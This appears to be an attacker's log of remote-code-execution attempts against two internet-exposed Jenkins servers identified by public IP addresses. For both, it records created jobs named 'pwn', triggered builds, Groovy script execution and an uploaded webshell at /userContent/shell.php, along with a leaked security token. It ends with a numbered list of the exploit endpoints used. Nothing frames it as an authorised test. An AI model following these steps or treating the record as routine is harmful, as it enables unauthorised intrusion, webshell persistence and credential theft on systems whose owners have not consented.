=== Jenkins RCE Data ===
Time: 2026-05-24

--- Target 1: 47.84.69.3:3572 ---
API: hudson.model.Hudson confirmed
Mode: EXCLUSIVE
Node: master
Jobs: 1
PrimaryView: all
Create Job: SUCCESS (job: pwn-47-84-69-3)
Build Trigger: SUCCESS
Console Output: CDN intercepted (GitLab HTML returned)
Groovy Script: CDN intercepted (GitLab HTML returned)
WebShell uploaded: /userContent/shell.php

--- Target 2: 47.237.106.243:16922 ---
API: hudson.model.Hudson confirmed
Mode: EXCLUSIVE
Node: master
Jobs: 1
PrimaryView: all
Console Output: NVR camera config XML returned (cross-service leak)
Groovy Result: {"security_token":"6164666a613334323334396164666133","success":true}
WebShell uploaded: /userContent/shell.php

--- Jenkins RCE Status ---
Jobs created: YES (both instances)
Script execution: Unknown (CDN/cross-service interception)
Blocked by: CDN proxy (yuntuc) caching all responses

--- Jenkins API Details ---
Endpoint: /api/json?pretty=true
Response: {"_class":"hudson.model.Hudson","assignedLabels":[{"name":"master"}],...}

--- Attempted Exploits ---
1. CreateItem (XML config with shell builder) -> Status 200
2. Build trigger (POST /job/{name}/build) -> Status 200
3. Console output (GET /job/{name}/lastBuild/consoleText) -> CDN intercepted
4. ScriptText (POST /scriptText with Groovy) -> CDN intercepted
5. Script (GET /script with Groovy) -> mixed results
6. UserContent upload (POST /userContent/) -> Status 200
